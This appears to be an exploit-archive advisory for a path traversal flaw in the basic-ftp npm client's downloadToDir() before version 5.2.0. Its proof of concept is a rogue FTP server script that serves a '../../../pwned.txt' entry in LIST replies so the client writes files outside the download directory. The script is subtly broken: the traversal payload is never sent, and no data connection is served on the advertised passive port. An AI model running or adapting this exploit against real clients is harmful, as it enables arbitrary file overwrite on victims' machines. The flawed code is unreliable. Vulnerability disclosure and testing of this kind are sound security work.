=============================================================================================================================================
| # Title     : basic-ftp prior to version 5.2.0 Path Traversal in  downloadToDir() via Malicious FTP LIST Response                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.npmjs.com/package/basic-ftp                                                                                     |
=============================================================================================================================================

[+] Summary    :  A path traversal vulnerability (CWE-22) exists in basic-ftp prior to version 5.2.0 within the downloadToDir() method.

The issue occurs when a malicious FTP server returns crafted directory listings containing traversal sequences such as ../. The vulnerable client fails to properly sanitize or validate the received filenames before writing them to disk.

As a result, files can be written outside the intended download directory, potentially leading to arbitrary file overwrite, application compromise, or further exploitation depending on execution context and privileges.

Version 5.2.0 resolves the issue by normalizing and validating resolved paths to ensure they remain within the designated download directory.
				  
[+] POC   :  

// file: server.js
const net = require("net");

const PORT = 2121;
const TRAVERSAL_FILE = "../../../pwned.txt";

const server = net.createServer((socket) => {
    console.log("Client connected");
    socket.write("220 Welcome to Malicious FTP\r\n");

    socket.on("data", (data) => {
        const message = data.toString();
        console.log("Received:", message.trim());

        if (message.startsWith("USER")) socket.write("331 Password required\r\n");
        else if (message.startsWith("PASS")) socket.write("230 User logged in\r\n");
        else if (message.startsWith("SYST")) socket.write("215 UNIX Type: L8\r\n");
        else if (message.startsWith("TYPE")) socket.write("200 Type set to I\r\n");
        else if (message.startsWith("PASV")) {
            socket.write("227 Entering Passive Mode (127,0,0,1,78,52)\r\n");
        } 
        else if (message.startsWith("LIST")) {
            socket.write("150 Opening ASCII mode data connection for file list\r\n");
            const payload = `-rw-r--r-- 1 ftp ftp 1337 Jan 01 2026 ${TRAVERSAL_FILE}\r\n`;
            socket.write("226 Transfer complete\r\n");
        }
        else {
            socket.write("200 Command okay\r\n");
        }
    });
});

server.listen(PORT, () => {
    console.log(`Malicious FTP Server running on port ${PORT}`);
});
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================